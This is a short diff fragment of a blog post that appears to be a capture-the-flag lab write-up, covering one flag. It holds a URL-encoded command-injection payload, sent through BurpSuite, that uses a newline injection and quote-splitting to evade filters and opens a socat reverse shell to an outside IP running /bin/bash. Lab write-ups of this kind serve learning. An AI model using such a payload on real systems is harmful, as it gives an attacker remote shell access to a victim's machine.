kchen4028/kchen4028.github.io/_posts/2025-03-14-AEN-Module.md

 ### Eleventh Flag:

 Since we have command execution, we can try using a reverse shell.
-I had a bit of trouble getting a reverse shell to work.
-I got a tip from Yerald Leiva's video where he used a socat shell.
 I tried the following url encoded command on BurpSuite:
 ```
 127.0.0.1%0a's'o'c'a't'%09TCP%3A10.10.16.41%3A4443%09EXEC%3A%2Fb'i'n%2Fbash
 ```